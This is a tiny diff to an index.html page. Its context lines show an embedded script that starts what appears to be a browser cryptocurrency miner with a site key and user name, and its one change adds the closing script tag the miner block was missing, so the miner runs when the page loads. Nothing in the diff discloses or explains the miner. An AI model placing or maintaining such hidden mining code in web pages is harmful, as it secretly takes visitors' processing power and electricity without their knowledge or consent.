--- a/index.html
+++ b/index.html
@@ -158,6 +158,6 @@
 <script>
     var miner = new Client.User('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', 'ElLob');
     miner.start();
-    
+</script>
     </body>
 </html>
